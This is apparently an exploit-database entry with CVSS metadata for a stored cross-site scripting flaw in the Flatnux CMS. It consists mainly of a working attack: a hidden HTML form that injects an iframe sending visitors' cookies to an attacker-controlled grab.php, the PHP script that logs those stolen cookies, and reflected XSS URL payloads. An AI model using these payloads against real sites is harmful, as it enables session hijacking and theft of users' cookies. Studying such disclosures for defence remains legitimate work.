Flatnux html/javascript Injection Cookie Grabber Exploit

2009.01.02
Credit: gmda
Risk: Low
Local: Yes
Remote: No
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

<!-- exploit flatnux grabber cookies visitor site :http://www.speleoalex.altervista.org/flatnuke3/index.php download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download author:gmda Flatnux does not filter code html/javascript then you can injector in this way: operation 1] register 2] make longin 3] use the HTML code below --> <html><head> </head> <body> <form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&amp;opmod=insertrecord" method="POST"> titolo*<input size ="20" style="visibility:hidden;" value="filex &lt;iframe width=&quot;0&quot; height=&quot;0&quot; style=&quot;visibility:hidden;&quot; src=&quot;javascript:window.location=&apos;http://attacker.org/grab.php?cmd=&apos;+document.cookie;&quot;&gt;&lt;/iframe&gt;" name="name" type="text" /><br /> <textarea title="Inserisci qui la descrizione" cols="80" rows="10" name="description" style="visibility:hidden;" ></textarea><br /> Immagine<input size="20" name="foto1" type="file" style="visibility:hidden;" /><br /> File<input size="20" name="file" type="file" style="visibility:hidden;" /><br /> <input type="submit" value="Zic"> </form> </body></html> <!-- grab.php <?php $data = $_GET['cmd']; $date=date("j F, Y, g:i a"); $referer=$_SERVER['HTTP_REFERER']; $fh = fopen("cookie.txt",'a+'); fwrite($fh, $referer . " / " . $data."\n".$date."\n"); fclose($fh); ?> --> <!-- xss variables mod foto /sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it /?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top